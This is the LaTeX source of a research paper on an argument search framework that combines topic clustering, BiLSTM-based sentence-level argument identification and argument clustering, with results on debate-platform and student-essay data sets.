First, documents are grouped into topics. Such documents can be individual texts or collections of texts under a common title, such as posts on Wikipedia or debate platforms. We compute the topic clusters using unsupervised clustering algorithms
and study the results of \textit{k-means} and \textit{HDBSCAN}~\cite{Campello2013} in detail.
We also take the $argmax$ of the tf-idf vectors and LSA~\cite{Deerwester1990} vectors directly into consideration
to evaluate how well topics are represented by single terms.
Overall, we consider the following models:
\begin{itemize}
\item $ARGMAX_{none}^{tfidf}$: We restrict the vocabulary size and the maximal document frequency to obtain a vocabulary representing topics with single terms. Thus, clusters are labeled with exactly one term by choosing the $argmax$ of these tf-idf document vectors.
\item $ARGMAX_{lsa}^{tfidf}$: We perform a dimensionality reduction with LSA on the tf-idf vectors. Therefore, each cluster is represented by a collection of terms.
\item $KMEANS_{none}^{tfidf}$: We apply the k-means clustering algorithm directly to tf-idf vectors and compare the results obtained by varying the parameter $k$.
\item $HDBSCAN_{umap}^{tfidf}$: We apply UMAP \cite{McInnes2018} dimensionality reduction on the tf-idf vectors. We then compute clusters using the HDBSCAN algorithm based on the resulting vectors.
\item $HDBSCAN_{lsa+umap}^{tfidf}$: Using the best parameter setting from the previous model, we apply UMAP dimensionality reduction on LSA vectors. Then, we evaluate the clustering results obtained with HDBSCAN while the number of dimensions of the LSA vectors is varied.
\end{itemize}
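A minimal sketch of the single-term labeling idea behind $ARGMAX_{none}^{tfidf}$, without the vocabulary-size and document-frequency restrictions we apply in practice (the toy documents are hypothetical):

```python
import math
from collections import Counter

def tfidf_argmax_labels(docs):
    """Label each document with its highest-scoring tf-idf term."""
    N = len(docs)
    tokenized = [d.lower().split() for d in docs]
    df = Counter(t for toks in tokenized for t in set(toks))  # document freq.
    labels = []
    for toks in tokenized:
        tf = Counter(toks)
        scores = {t: c * math.log(N / df[t]) for t, c in tf.items()}
        labels.append(max(scores, key=scores.get))
    return labels

docs = ["tax tax policy debate", "climate climate policy debate"]
# Terms shared by all documents get idf 0, so the topic-specific
# terms "tax" and "climate" win.
```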
\subsection{Argument Identification}
\label{sec:Approach:SEG}
For the second step of our argument search framework, we propose the segmentation of sentences into argumentative units.
Related works define arguments either on the document level~\cite{Wachsmuth2017} or the sentence level~\cite{Levy2018}\cite{Stab2018}, whereas in this paper we define an argumentative unit as a sequence of multiple sentences. This yields two advantages:
(1)~We can capture the context of arguments over multiple sentences (e.g., claim and its premises);
(2)~Argument identification becomes applicable to a wide range of texts (e.g., user-generated texts).
Thus, we train a sequence-labeling model to predict for each sentence whether it
starts an argument, continues an argument, or is outside of an argument (i.e., \textit{BIO-tagging}). Based on the findings of \citet{Ajjour2017}, \citet{Eger2017}, and \citet{Petasis2019}, we use a BiLSTM over more complex architectures like BiLSTM-CRFs. The BiLSTM is better suited than an LSTM as the bi-directionality takes both preceding and succeeding sentences into account for predicting the label of the current sentence. We evaluate the sequence-labeling results against a feedforward neural network as a baseline classification model that predicts the label of each sentence independently of its context.
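The sentence-level BIO scheme can be illustrated by the label construction used for training (a simplified sketch; the spans are hypothetical annotation examples):

```python
def bio_tags(n_sentences, argument_spans):
    """Per-sentence BIO labels from argument spans given as inclusive
    (start, end) sentence indices: B = begins an argument,
    I = continues one, O = outside of any argument."""
    tags = ['O'] * n_sentences
    for start, end in argument_spans:
        tags[start] = 'B'
        for i in range(start + 1, end + 1):
            tags[i] = 'I'
    return tags
```

A sequence labeler such as the BiLSTM then predicts these tags jointly over the sentence sequence rather than classifying each sentence in isolation.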
We consider two ways to compute embeddings over sentences with BERT~\cite{Devlin2018}:
\begin{itemize}
\item \emph{bert-cls}, denoted as $MODEL_{cls}^{bert}$, uses the output of BERT corresponding to the $[CLS]$ token after processing a sentence.
\item \emph{bert-avg}, denoted as $MODEL_{avg}^{bert}$, uses the average of the word embeddings calculated with BERT as a sentence embedding.
\end{itemize}
\subsection{Argument Clustering}
\label{sec:Approach:AS}
In the argument clustering task, we apply the same methods (k-means, HDBSCAN) as in the topic clustering step to group the arguments within a specific topic by topical aspects. Specifically, we compute clusters of arguments for each topic and compare the performance of k-means and HDBSCAN with tf-idf, as well as \emph{bert-avg} and \emph{bert-cls} embeddings. Furthermore, we investigate whether calculating tf-idf within each topic separately is superior to computing tf-idf over
all arguments in the document corpus (i.e., across topics).
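A toy example (hypothetical mini-corpus) illustrates why the two tf-idf variants can differ: a term shared by all arguments of one topic is uninformative within that topic but informative across topics.

```python
import math
from collections import Counter

def idf(docs):
    """Inverse document frequency per term over a document collection."""
    N = len(docs)
    df = Counter(t for d in docs for t in set(d.split()))
    return {t: math.log(N / c) for t, c in df.items()}

topic_tax = ["tax cut growth", "tax burden fairness"]
topic_school = ["school funding reform", "school choice debate"]
global_idf = idf(topic_tax + topic_school)   # idf computed across topics
local_idf = idf(topic_tax)                   # idf computed within one topic
# "tax" carries zero weight within its own topic but nonzero weight globally.
```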
\section{Conclusion} %
\label{sec:Conclusion}
In this paper, we proposed an argument search framework that combines keyword search with precomputed topic clusters for argument-query matching, applies a novel approach to argument identification based on sentence-level sequence labeling, and aggregates arguments via argument clustering.
Our evaluation with real-world data
showed that our framework can be used
to mine and search for arguments from unstructured text
on any given topic.
It
became clear that a full-fledged argument search requires a deep understanding of text and that the individual steps can still be improved.
We suggest future research on developing argument search approaches that are sensitive to different aspects of argument similarity and argument quality. %
\section{Evaluation}
\label{sec:Evaluation}
\subsection{Evaluation Data Sets}
\label{sec:Evaluation:Datasets}
In total, we use four data sets for evaluating the different steps of our argument retrieval framework.
\begin{enumerate}
\item \textbf{Debatepedia} is a debate platform that lists the arguments on a topic on one page, with subtitles structuring the arguments into different aspects.\footnote{We use the data
available at \url{https://webis.de/}.\label{dataset:webis}}
\item \textbf{Debate.org} is a debate platform that is organized in rounds where each of two opponents submits posts arguing for their side. Accordingly, the posts might also include non-argumentative parts used for answering the important points of the opponent before introducing new arguments.\footref{dataset:webis}
\item \textbf{Student Essay} \cite{Stab2017} is widely used in research on argument segmentation \cite{Eger2017, Ajjour2017, Petasis2019}. Labeled on token-level, each document contains one major claim and several claims and premises. We can use this data set for evaluating argument identification.
\item \textbf{Our Dataset} is based on a debate.org crawl.\footref{dataset:webis} It is restricted to a subset of four out of the total 23 categories -- \textit{politics}, \textit{society}, \textit{economics} and \textit{science} -- and contains additional annotations.
Three human annotators familiar with linguistics segmented these documents and labeled them as being of \emph{medium} or \emph{low} quality, allowing us to exclude low-quality documents.
The annotators were then asked to indicate the beginning of each new argument, to label argumentative sentences summarizing the aspects of the post as \emph{conclusion}, and to mark non-argumentative sentences as \emph{outside of argumentation}. In this way, we obtained a ground truth of arguments labeled on the sentence level (Krippendorff's $\alpha=0.24$ based on 20 documents and three annotators).
A
description of the data set is provided online.\footnote{See
\url{https://github.com/michaelfaerber/arg-search-framework}.}
\end{enumerate}
\textbf{Train-Validation-Test Split.} We use the splits provided by \citet{Stab2017} for the student essay data set. The other data sets are divided into train, validation and test splits based on topics (15\% of the topics were used for testing).
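A topic-level split of this kind can be sketched as follows (the helper below is illustrative, not the exact preprocessing code); splitting on topics rather than documents ensures that no topic contributes documents to both the train and the test side:

```python
import random

def split_by_topics(docs_by_topic, test_frac=0.15, seed=0):
    """Split a corpus into train and test sets on the topic level.

    docs_by_topic maps a topic id to its list of documents; test_frac
    is the fraction of *topics* (not documents) held out for testing.
    """
    topics = sorted(docs_by_topic)
    random.Random(seed).shuffle(topics)
    n_test = max(1, round(test_frac * len(topics)))
    test_topics = set(topics[:n_test])
    train = {t: d for t, d in docs_by_topic.items() if t not in test_topics}
    test = {t: d for t, d in docs_by_topic.items() if t in test_topics}
    return train, test
```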
\begin{table*}[tb]
\centering
\caption{Results of unsupervised topic clustering on the \emph{debatepedia} data set $-$ \%$n$:~noise examples (HDBSCAN)
}
\label{tab:Results:ClusteringUnsupervised}
\begin{small}
\resizebox{0.99\textwidth}{!}{
\begin{tabular}{@{}l rrrrr r rrrrr@{}}
\toprule
& \multicolumn{5}{c}{With noise}& &\multicolumn{5}{c}{\emph{Without noise}}\\
\cline{2-6} \cline{8-12}
& \#$Clust.$ & $ARI$ &$Ho$ & $Co$ & $BCubed~F_1$ & \%$n$ & \#$Clust.$ & $ARI$ &$Ho$ & $Co$ & $BCubed~F_1$ \\
\midrule
$ARGMAX_{none}^{tfidf}$
&253 & 0.470 &0.849 & 0.829 & 0.591 & $-$ & $-$ & $-$ & $-$ & $-$ & $-$\\
$ARGMAX_{lsa}^{tfidf}$
&157 & 0.368 & 0.776& 0.866 & 0.561& $-$ & $-$ & $-$ & $-$ & $-$ & $-$\\
$KMEANS_{none}^{tfidf}$
&170 & \textbf{0.703} & 0.916 & 0.922 & 0.774 & $-$ & $-$ & $-$ & $-$ & $-$ & $-$ \\
$HDBSCAN_{none}^{tfidf}$
& 206 & 0.141 &0.790 & 0.870 & 0.677 & 21.1 &205 & 0.815 &0.955& 0.937 & 0.839\\
$HDBSCAN_{umap}^{tfidf}$
& 155 & 0.673 &0.900 & 0.931 & 0.786 & 4.3 & 154 & 0.779 &0.927& 0.952& 0.827\\
$HDBSCAN_{lsa + umap}^{tfidf}$
&162 & 0.694 & 0.912& 0.935& \textbf{0.799} & 3.6 &161 & 0.775 &0.932 &0.950 & 0.831\\
\bottomrule
\end{tabular}
}
\end{small}
\end{table*}
\begin{table*}[tb]
\centering
\caption{Results of unsupervised topic clustering on the \emph{debate.org} data set
$-$ \%$n$:~noise examples (HDBSCAN)}
\label{tab:Results:ClusteringUnsupervisedORG}
\begin{small}
\resizebox{0.99\textwidth}{!}{
\begin{tabular}{@{}l rrrrr r rrrrr@{}}
\toprule
& \multicolumn{5}{c}{With noise}& &\multicolumn{5}{c}{\emph{Without noise}}\\
\cline{2-6} \cline{8-12}
& \#$Clust.$ & $ARI$ & $Ho$ &$Co$& $BCubed~F_1$ & \%$n$ &\#$Clust.$ & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ \\
\midrule
$KMEANS_{none}^{tfidf}$ & 50 & \textbf{0.436} & 0.822 & 0.796 & \textbf{0.644} &$-$&$-$&$-$&$-$&$-$&$-$\\
$HDBSCAN_{umap}^{tfidf}$
& 20 & 0.354 &0.633& 0.791 & 0.479 & 7.1 & 19 & 0.401 & 0.648 & 0.831 & 0.502\\
$HDBSCAN_{lsa + umap}^{tfidf}$
&26 & 0.330 & 0.689 &0.777 & 0.520 & 5.8 & 25 & 0.355 & 0.701 & 0.790 &0.542\\
\bottomrule
\end{tabular}
}
\end{small}
\end{table*}
\subsection{Evaluation Settings}
\label{sec:Evaluation:Methods}
We report the results by using the evaluation metrics
precision, recall and $F_1$-measure concerning the classification, and adjusted rand index (ARI), homogeneity (Ho), completeness (Co), and $BCubed~F_1$ score concerning the clustering.
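While ARI, homogeneity, and completeness are available in standard libraries, the $BCubed~F_1$ score is less common; for reference, a minimal implementation of the standard per-item formulation (illustrative):

```python
def bcubed_f1(gold, pred):
    """BCubed F1 for two flat clusterings given as lists of cluster ids
    aligned by item.

    Per-item precision is the fraction of the item's predicted cluster
    that shares its gold cluster; recall swaps the roles. The final score
    is the harmonic mean of the averaged precision and recall.
    """
    n = len(gold)
    precision = recall = 0.0
    for i in range(n):
        same_pred = {j for j in range(n) if pred[j] == pred[i]}
        same_gold = {j for j in range(n) if gold[j] == gold[i]}
        overlap = len(same_pred & same_gold)
        precision += overlap / len(same_pred)
        recall += overlap / len(same_gold)
    precision, recall = precision / n, recall / n
    return 2 * precision * recall / (precision + recall)
```

A perfect clustering (up to relabeling) scores 1.0; collapsing everything into one cluster keeps recall at 1.0 but lowers precision.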
\textbf{Topic Clustering.} We use HDBSCAN with a minimum cluster size of 2.
For k-means, we vary the parameter $k$ that determines the number of clusters and report only the results of the best setting.
For the model $ARGMAX_{none}^{tfidf}$ we restrict the vocabulary size and the maximal document frequency of the tf-idf to obtain a vocabulary that best represents the topics by single terms. %
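The idea behind $ARGMAX_{none}^{tfidf}$ can be illustrated with a small self-contained sketch (plain tf-idf without the vocabulary restrictions mentioned above; the function name is illustrative): each document is assigned to the cluster named by its highest-scoring term, so documents sharing their most characteristic word end up in the same topic cluster.

```python
import math
from collections import Counter

def argmax_tfidf_clusters(docs):
    """Assign each document the label of its highest-tf-idf term."""
    tokenized = [doc.lower().split() for doc in docs]
    # document frequency: in how many documents does each term occur?
    df = Counter(t for tokens in tokenized for t in set(tokens))
    n = len(docs)
    clusters = []
    for tokens in tokenized:
        tf = Counter(tokens)
        # score(t) = tf(t) * idf(t); the argmax term names the cluster
        clusters.append(max(tf, key=lambda t: tf[t] * math.log(n / df[t])))
    return clusters
```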
\textbf{Argument Identification.}
We use a BiLSTM implementation with 200 hidden units and apply \textit{SigmoidFocalCrossEntropy} as the loss function.
Furthermore, we use the \emph{Adagrad} optimizer~\cite{Duchi2011} and train the model for 600 epochs, shuffling the data in each epoch and keeping only the model that performs best on the validation loss. The baseline feedforward neural network contains a single hidden dense layer of size 200 and is trained with the same hyperparameters.
As BERT implementation, we use DistilBERT~\cite{Sanh2019}. %
\begin{figure}[tb]
\centering
\includegraphics[width=0.78\linewidth]{images/subtopic_argument_correlation2}
\caption{Linear regression of arguments and their topical aspects for the \emph{debatepedia} data set.}%
\label{fig:Results:Correlation}
\end{figure}
\textbf{Argument Clustering.}
We estimate the parameter $k$ for the k-means algorithm for each topic using a linear regression based on the number of clusters relative to the number of arguments in this topic. As shown in Figure \ref{fig:Results:Correlation}, we observe a linear relationship between the number of topical aspects (i.e., subtopics) and the argument count per topic in the \emph{debatepedia} data set.
We apply HDBSCAN with the same parameters as in the topic clustering task (\emph{min\_cluster\_size}~=~2).
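The $k$ estimation can be sketched as a simple linear fit on the training topics (the function name and the lower bound of $k=2$ are our illustrative choices):

```python
import numpy as np

def estimate_k(train_arg_counts, train_n_clusters, n_arguments):
    """Estimate k for k-means on a new topic from a linear fit between the
    number of arguments and the number of topical aspects observed on
    training topics (the relationship is roughly linear on debatepedia)."""
    slope, intercept = np.polyfit(train_arg_counts, train_n_clusters, 1)
    return max(2, round(slope * n_arguments + intercept))
```

For instance, with training topics following $k \approx 0.2 \cdot n + 1$, a topic with 25 arguments would be clustered with $k = 6$.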
\section{Introduction}
\label{sec:Introduction}
Arguments are an integral part of
debates and discourse between people. For instance, journalists, scientists, lawyers, and managers often need to pool arguments and contrast pros and cons \cite{DBLP:conf/icail/PalauM09a}.
In light of this, argument search has been proposed to retrieve relevant arguments for a given query (e.g., \emph{gay marriage}).
Several argument search approaches have been proposed in the literature~\cite{Habernal2015,Peldszus2013}.
However, major challenges of argument retrieval still exist, such as identifying and clustering arguments concerning controversial topics %
and extracting arguments from a wide range of texts on a fine-grained level.
For instance, the argument search system args.me \cite{Wachsmuth2017} uses a keyword search to match relevant documents and lacks the extraction of individual arguments. In contrast, ArgumenText \cite{Stab2018} applies keyword matching on single sentences to identify relevant arguments, neglecting the context and yielding rather shallow arguments.
Furthermore, IBM Debater \cite{Levy2018} proposes a rule-based extraction of arguments from Wikipedia articles utilizing prevalent structures to identify sentence-level arguments.
Overall, the existing approaches lack (a)~semantic argument-query matching,
(b)~a segmentation of documents into argumentative units of arbitrary size, and (c)~a clustering of arguments w.r.t.\ subtopics, as required for a fully equipped framework.
In this paper, we propose a novel argument search framework
that addresses these aspects
(see Figure~\ref{fig:Approach:Pipeline}):
During the \textit{topic clustering} step, we group argumentative documents by topics and, thus, identify the set of %
relevant documents for a given search query
(e.g., \textit{gay marriage}). To overcome the limitations of keyword search approaches, we rely on semantic representations via embeddings
in combination with established clustering algorithms.
Based on the relevant documents, the \textit{argument segmentation} step aims at identifying and separating arguments. We hereby understand arguments to consist of one or multiple sentences and propose a BiLSTM-based sequence labeling method. %
In the final \textit{argument clustering} step, we identify the different aspects of the topic at hand that are
covered
by the arguments identified in the previous step.
We evaluate all three steps of our framework based on
real-world data sets from several domains.
By using the output of one framework component as input for the subsequent component, our evaluation is particularly challenging but realistic. In the evaluation, we show that by using embeddings, text labeling, and clustering, we can extract and aggregate arguments from unstructured text to a considerable extent.
Overall, our framework
provides the basis for advanced
argument search in real-world scenarios with little training data.
\begin{figure*}[tb]
\centering
\includegraphics[width=0.99\textwidth]{images/new_approach.png}
\caption{Overview of our framework for argument search. %
}
\label{fig:Approach:Pipeline}
\end{figure*}
In total, we make the following contributions:
\begin{itemize}
\setlength\itemsep{0em}
\item We propose a novel argument search framework for fine-grained argument retrieval
based on topic clustering, argument identification, and argument clustering.\footnote{The source is available online at \url{https://github.com/michaelfaerber/arg-search-framework}.}
\item We provide a new evaluation data set for sequence labeling of arguments.
\item We evaluate all steps of our framework extensively based on four data sets.
\end{itemize}
In the following,
after discussing related work in Section~\ref{sec:RelatedWork},
we propose our argument mining framework in Section~\ref{sec:Approach}.
Our evaluation is presented in Section~\ref{sec:Evaluation}.
Section~\ref{sec:Conclusion} concludes the paper.
\section{Related Work}
\label{sec:RelatedWork}
\textbf{Topic Clustering. }
Various approaches for modeling the topics of documents have been proposed, such as Latent Dirichlet Allocation (LDA) and Latent Semantic Indexing (LSI).
Topic detection and tracking~\cite{Wayne00} and topic segmentation~\cite{Ji2003} have been pursued in detail in the IR community.
\citet{Sun2007} introduce an unsupervised method for
topic detection and topic segmentation of multiple similar documents.
Among others, \citet{Barrow2020}, \citet{Arnold2019}, and \citet{Mota2019} propose models for segmenting documents and assigning topic labels to these segments, but ignore arguments.
\textbf{Argument Identification. }
\label{sec:RelatedWork:ArgumentRecognition}
Argument identification can be approached on the \textit{sentence level} by deciding for each sentence whether it constitutes an argument. For instance, IBMDebater \cite{Levy2018} relies on a combination of rules and weak supervision for classifying sentences as arguments.
In contrast, ArgumenText \cite{Stab2018} does not limit its argument identification to sentences.
\citet{Reimers2019} show that contextualized word embeddings can improve the identification of sentence-level arguments.
Argument identification has also been approached on the level of \textit{argument units}, i.e., the building blocks of an argument, such as claims and premises.
\citet{Ajjour2017} compare machine learning techniques
for argument segmentation on several corpora. %
The authors observe that
BiLSTMs mostly achieve the best results. %
Moreover, \citet{Eger2017} and \citet{Petasis2019} show
that using more advanced models, such as combining a BiLSTM with CRFs and CNNs, hardly improves the BIO tagging results. Hence, we also create a BiLSTM model for argument identification.
\textbf{Argument Clustering.}
\label{sec:RelatedWork:ArgumentClustering}
\citet{Ajjour2019a} approach argument aggregation by identifying non-overlapping \emph{frames}, defined as a set of arguments from one or multiple topics that focus on the same aspect.
\citet{Bar-Haim2020} propose an argument aggregation approach by mapping similar arguments to common \emph{key points}, i.e., high-level arguments.
They observe that models with BERT embeddings perform the best for this task.
\citet{Reimers2019} propose the clustering of arguments based on the similarity of two sentential arguments with respect to their topics.
Also here, a fine-tuned
BERT model is most successful for assessing the argument similarity automatically. %
While our framework is also based on BERT for argument clustering, the arguments in our framework can consist of several sentences, which makes the framework more flexible on the one hand, but argument clustering more challenging on the other.
\textbf{Argument Search Demonstration Systems. } %
\label{sec:RelatedWork:Frameworks}
\citet{Wachsmuth2017} propose the argument search framework \textit{args.me}
using online debate platforms. %
The arguments are considered on the document level.
\citet{Stab2018} propose the framework \textit{ArgumenText} for argument search. %
The retrieval of topic-related web documents
is based on keyword matching, while the argument identification is based on a binary sentence classification.
\citet{Levy2018} propose
\textit{IBM Debater} based on Wikipedia articles. Arguments are defined as single claim sentences that explicitly discuss a \emph{main concept} in Wikipedia
and that are identified via rules.
\textbf{Argument Quality Determination.}
Several approaches and data sets have been published on determining the quality of arguments \cite{DBLP:conf/acl/GienappSHP20,DBLP:conf/cikm/DumaniS20,DBLP:conf/aaai/GretzFCTLAS20}, which is beyond the scope of this paper.
\subsection{Evaluation Results}
\label{sec:Results}
In the following, we present the evaluation results for the tasks of topic clustering, argument identification, and argument clustering.
\begin{table*}[h]
\centering
\caption{Results of the clustering of arguments of the \emph{debatepedia} data set by topical aspects. \emph{across topics}:~tf-idf scores are computed across topics, \emph{without noise}:~{HDBSCAN} is only evaluated on those examples which are not classified as noise.}
\label{tab:Results:ASUnsupervised}
\begin{small}
\resizebox{0.85\textwidth}{!}{
\begin{tabular}{@{}l l l cccc l@{}}
\toprule
Embedding & Algorithm & Dim. Reduction & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ & Remark\\
\midrule
tf-idf & HDBSCAN & UMAP & 0.076 & 0.343 &0.366& 0.390 & \\
tf-idf & HDBSCAN & UMAP & 0.015 & 0.285 &0.300& 0.341 &\emph{across topics} \\
tf-idf & HDBSCAN & $-$ & \textbf{0.085} & \textbf{0.371} &\textbf{0.409}& \textbf{0.407} & \\
tf-idf & k-means & $-$ & 0.058 & 0.335 &0.362& 0.397 & \\
tf-idf & k-means & $-$ & 0.049 & 0.314 &0.352& 0.402 &\emph{across topics} \\
\midrule
bert-cls & HDBSCAN & UMAP & 0.030 & 0.280 &0.298& 0.357 & \\
bert-cls & HDBSCAN & $-$ & 0.016 & 0.201 &0.324& 0.378 & \\
bert-cls & k-means & $-$ & 0.044 & 0.332 &0.326& 0.369 & \\
\midrule
bert-avg & HDBSCAN & UMAP & 0.069 & 0.321 &0.352& 0.389 & \\
bert-avg & HDBSCAN & $-$ & 0.018 & 0.170 &0.325& 0.381 & \\
bert-avg & k-means & $-$ & 0.065 & 0.337 &0.349& 0.399 & \\
\midrule
tf-idf & HDBSCAN & $-$ & 0.140 & 0.429 &0.451& 0.439 &\emph{without noise}\\
\bottomrule
\end{tabular}
}
\end{small}
\end{table*}
\begin{figure*}[h]
\centering
\includegraphics[width = 0.42\textwidth]{key_results/AS/hdbscan_scatterplot2}
\includegraphics[width = 0.42\textwidth]{key_results/AS/kmeans-bert_scatterplot2}
\caption{Argument clustering results (measured by $ARI$, $BCubed~F_1$, and homogeneity) for HDBSCAN on tf-idf embeddings and k-means on \emph{bert-avg} embeddings.}
\label{fig:Results:Scatterplot}
\end{figure*}
\textbf{Topic Clustering.}
We evaluate unsupervised topic clustering based on the 170 topics from the \textit{debatepedia} data set. As shown in Table~\ref{tab:Results:ClusteringUnsupervised}, density-based clustering algorithms such as {HDBSCAN}, applied to tf-idf document embeddings, are particularly suitable for this task and clearly outperform alternative clustering approaches. We find that their ability to handle unclear examples as well as clusters of varying shapes, sizes, and densities is crucial to their performance.
{HDBSCAN} in combination with a preceding dimensionality reduction step achieves an $ARI$ score of 0.779. However, these quantitative results must be considered from the standpoint that topics in the \emph{debatepedia} data set are overlapping and, thus, the reported scores are lower bound estimates.
When evaluating the clustering results for the \emph{debatepedia} data set qualitatively,
we find that many predicted clustering decisions are reasonable but evaluated as erroneous in the quantitative assessment. For instance,
we see that
documents on \textit{gay parenting}
appearing in the debate about \textit{gay marriage} can be assigned to a cluster with documents on \textit{gay adoption}.
Furthermore, we investigate the impact on the recall of relevant documents and observe a clear improvement of topic clusters over keyword matching for argument-query matching.
For instance, given the topic \emph{gay adoption}, many documents from debatepedia.org use related terms like \emph{homosexual} and \emph{parenting} instead of explicitly mentioning \emph{`gay'} and \emph{`adoption'} and, thus, cannot be found by a keyword search.
We additionally evaluate the inductive capability of our topic clustering approach by applying it to debates from debate.org (see Table~\ref{tab:Results:ClusteringUnsupervisedORG}). We observe that unsupervised clustering on tf-idf embeddings achieves a moderate $ARI$ score of 0.436 on these debates.
\textbf{Argument Identification.}
To evaluate the identification of argumentative units based on sentence-level sequence-labeling, we apply our approach to the \emph{Student Essay} data set (see Table~\ref{tab:Results:Segmentation}) and achieve a macro $F_1$ score of 0.705 with a BiLSTM-based sequence-learning model on sentence embeddings computed with BERT. Furthermore, we observe a strong influence of the data sources on the results for argument identification. For instance, in the case of the \textit{Student Essay} data set, information about the current sentence as well as the surrounding sentences is available yielding accurate segmentation results ($F_{1,macro}=0.71$, $F_{1,macro}^{BI}=0.96$).
\textbf{Argument Clustering.}
Finally, we evaluate the clustering of arguments consisting of one or several sentences by topical aspects, based on tf-idf and BERT embeddings of the arguments (see Table~\ref{tab:Results:ASUnsupervised}). Overall, the performance of the investigated argument clustering methods is rather low. We find that this is because information on topical aspects is scarce and often underweighted when arguments consist of multiple sentences.
Given Figure~\ref{fig:Results:Scatterplot}, we can observe that the performance of the clustering does not depend on the number of arguments.
\begin{table}
\centering
\caption{Confusion matrices of $BILSTM_{cls}^{bert}$: Rows represent ground-truth labels and columns represent predictions.\\Left: \emph{Student Essay} data set, Right: \emph{debate.org} data set.}
\label{tab:Results:CM}
\begin{small}
\begin{tabular}{c| ccc}
& B & I & O\\
\midrule
B&15 & 33 & 0\\
I&24 & 226 & 0 \\
O&39 & 94 & 2\\
\bottomrule
\end{tabular}
\hspace{1cm}
\begin{tabular}{c| ccc}
& B & I & O\\
\midrule
B&1 & 24 & 23\\
I&0 & 135 & 115 \\
O&0 & 50 & 85\\
\bottomrule
\end{tabular}
\end{small}
\end{table}
\begin{table*}[tb]
\centering
\caption{Overview of the topics with the highest $ARI$ scores for HDBSCAN and k-means.}
\label{tab:Results:BestTopics}
\begin{small}
\begin{tabular}{@{}l p{7cm} rr cccc @{}}
\toprule
&Topic & \#$Clust._{true}$ & \#$Clust._{pred}$ & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ \\
\toprule
\multicolumn{8}{c}{\textbf{HDBSCAN based on tf-idf embeddings}}\\
\midrule
1 &Rehabilitation vs retribution
&2 &3 & 0.442 &1.000 &0.544 &0.793 \\
2 &Manned mission to Mars
&5 &6 &0.330 & 0.461&0.444 & 0.515\\
3 & New START Treaty
&5 &4 &0.265 &0.380 &0.483 &0.518 \\
4 &Obama executive order to raise the debt ceiling
&3 &6 & 0.247 &0.799 &0.443 &0.568 \\
5 &Republika Srpska secession from Bosnia and Herzegovina
&4 &6 &0.231 &0.629 &0.472 &0.534 \\
6& Ending US sanctions on Cuba
&11 &9 & 0.230&0.458 &0.480 &0.450 \\
\toprule
\multicolumn{8}{c}{\textbf{k-means based on \emph{bert-avg} embeddings}}\\
\midrule
1 &Bush economic stimulus plan
&7 &5 & 0.454 &0.640 &0.694 &0.697 \\
2 &Hydroelectric dams
&11 &10 &0.386 & 0.570&0.618 & 0.537\\
3 & Full-body scanners at airports
&5 &6 &0.301 &0.570 &0.543 &0.584 \\
4 &Gene patents
&4 &7 & 0.277 &0.474 &0.366 &0.476 \\
5 &Israeli settlements
&3 &4 &0.274 &0.408 &0.401 &0.609 \\
6& Keystone XL US-Canada oil pipeline
&2 &3 & 0.269&0.667 &0.348 &0.693 \\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\begin{figure}[tb]
\centering
\includegraphics[width=0.4\textwidth]{key_results/AS/ARI_two_models3}
\includegraphics[width=0.4\textwidth]{key_results/AS/ARI_hdbscan2}
\caption{Argument clustering consensus based on the $ARI$ between (top) HDBSCAN and k-means score and (bottom) HDBSCAN model and the ground-truth.}
\label{fig:Results:Hist}
\end{figure}
\subsubsection{Topic Clustering}
\label{sec:Results:DS}
The results of the unsupervised clustering approach, based on a subset of the \emph{debatepedia} data set with 170 topics, are shown in Table \ref{tab:Results:ClusteringUnsupervised}. The simple model $ARGMAX_{none}^{tfidf}$ computes clusters based on the words with the highest tf-idf score within a document. Its $ARI$ score of $0.470$ indicates that many topics in the \emph{debatepedia} data set can already be represented by a single word. Considering the $ARGMAX_{lsa}^{tfidf}$ model, the lower $ARI$ score of $0.368$ indicates that using the topics found by LSA does not add value compared to tf-idf vectors.
Furthermore, we compare k-means with the density-based clustering algorithm HDBSCAN.
First, we find that $HDBSCAN_{lsa + umap}^{tfidf}$ and $KMEANS_{none}^{tfidf}$, with $ARI$ scores of $0.694$ and $0.703$, respectively, achieve a comparable performance on the tf-idf vectors. However, since HDBSCAN accounts for noise in the data, which it pools within a single cluster, the five rightmost columns of Table \ref{tab:Results:ClusteringUnsupervised} have to be considered when deciding on a clustering method for further use. When excluding the noise cluster from the evaluation, thereby considering only the approx.\ 96\% of instances for which $HDBSCAN_{lsa + umap}^{tfidf}$ and $HDBSCAN_{umap}^{tfidf}$ are confident about the cluster membership, the $ARI$ score of the clustering amounts to $0.78$. Considering that 21.1\% of the instances are classified as noise by $HDBSCAN_{none}^{tfidf}$, compared to 4.3\% for $HDBSCAN_{umap}^{tfidf}$, we conclude that applying a UMAP dimensionality reduction step before the HDBSCAN clustering is essential for its performance on the \emph{debatepedia} data set.
\textbf{Qualitative Evaluation.} Looking at the predicted clusters reveals that many of the clusters considered as erroneous are reasonable. For example, $HDBSCAN_{lsa + umap}^{tfidf}$ maps the document with the title \emph{`Military recruiting: Does NCLB rightly allow military recruiting in schools?'} of the topic \emph{`No Child Left Behind Act'} to the cluster representing the topic \emph{`Military recruiting in public schools'}.
Another such example is a cluster that is largely comprised of documents about \emph{`Gay adoption'}, but contains one additional document \emph{`Parenting: Can homosexuals do a good job of parenting?'} from the topic \emph{`Gay marriage'}.
\textbf{Inductive Generalization.}
We apply the unsupervised approach to the \emph{debate.org} data set to evaluate whether the model generalizes. The results in Table \ref{tab:Results:ClusteringUnsupervisedORG} show that k-means performs distinctly better on the \emph{debate.org} data set than HDBSCAN ($ARI$ scores of 0.436 vs.\ 0.354) because this data set is characterized by a high number of single-element topics. In contrast to k-means, HDBSCAN does not allow single-element clusters, so such topics get pooled into a single noise cluster. This is also reflected by the different numbers of clusters as well as the lower homogeneity scores of HDBSCAN (0.633 and 0.689, compared to 0.822 for k-means) at a comparable completeness of approx.\ 0.8.
\textbf{Topic Clusters for Argument-Query Matching.}
Applying a keyword search would retrieve only the subset of the relevant arguments that mention the search phrase explicitly. Combining a keyword search on documents with the clusters found by HDBSCAN enables an argument search framework to retrieve arguments from a broader set of documents. For example, in the \textit{debatepedia.org} data set, we observe that clusters of arguments related to \emph{gay adoption} include words like \emph{parents}, \emph{mother}, \emph{father}, \emph{sexuality}, \emph{heterosexual}, and \emph{homosexual}, while neither \emph{gay} nor \emph{adoption} is mentioned explicitly.
